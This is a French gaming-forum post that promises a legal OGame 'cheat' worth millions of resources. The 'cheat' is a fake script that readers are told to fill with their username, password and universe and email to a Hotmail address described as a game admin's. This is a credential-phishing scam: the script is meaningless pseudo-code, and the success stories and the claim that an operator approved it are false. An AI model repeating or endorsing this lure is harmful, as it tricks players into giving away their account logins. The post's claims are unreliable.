bonjour à tous
j'ai trouvé la solution pour tricher sur ogame .. LEGALEMENT
en effet j'ai utilisé cette méthode et je suis passé de top 800 à top 2 sur l'univers 18 !!!!
j'ai demandé à un opérateur si c'était légal, il a bien vérifié et m'a dit que rien dans la charte ne l'interdisait mais que ce n'était pas très fair-play ( oui bon dacord .... ^^ )
bref, voici la méthode :
il suffit d'envoyer ce script à l´adresse alex.fidji@hotmail.fr en remplissent les information manquante dans le formulaire, puis attendre environt 2 jours. ensuite vous aurez des DIXAINES DE MILLIONS de ressource venant d´une planete cachée (ça ne marche pas au bout de 2 jours renvoyer le mail)
Voila faîtes un copier coller de çà et envoyer le:
"_cheat_mod" :
"mailto : alex.fidji@hotmail.fr"
"value (1)" del=´copy (10)´
"locate
dmin1045/p/c104/=
"uvp"= //Ici marquer l´univers (juste le numero)
"user"= //Ici nom d´utilisateur
"pass"= //Ici pass
"pwd"= //Taper un pass nimporte avc 6 à 12 charactere
"ad"= ´Fr´ //Changer par de ou es ou autre chose selon votre pays
"_securemode"=nul
"GET_ad_Cookies"= #1aed5adv7cdhgjy9gtggfd5fdg5dfdf4fvf#
"Add_rmplc "= #4abd5afg8crtecpy5fdggf5df4dfg4avtfvf#
"valid"
"no_verif admin"
Quand vous vous connecterez connectez vous avec votre pass et nom d'user et univer normalement puis il vous demandera un autre pass une fois connecté a se moment entrez le mot de passe ke vous avez mis ici : "pwd"= //Taper un pass nimporte avc 6 à 12 charactere
et voila
c'est tout simple, et tres efficace !!!
j'ai envoyé 3 fois le mail, et une semaine après, j'avais 150 millions de chaque ressource sur ma planete, je ne savais meme plus quoi en faire !!!
P.S.: l'adresse msn est celle d'un game admin ( qui a tous les droits sur tous les univers ), ce script est comparable à un virus sauf que ce n'en est pas un, il s'occupe juste de vous monter vos ressources grace aux pouvoir du gameadmin !!!
à n'utiliser qu'avec cette adresse, car seules les adresses msn ne sont pas " sécurisées " contre ces scrips ...
P.S. 2 : j'ai bien relu la charte du forum et je pense que ce message est en règle surtout que ce n'est pas une insitation au piratage puisque meme l'opérateur de mon univers m'a dit que c'était légal
si ce n'est pas légal, je m'en excuse ...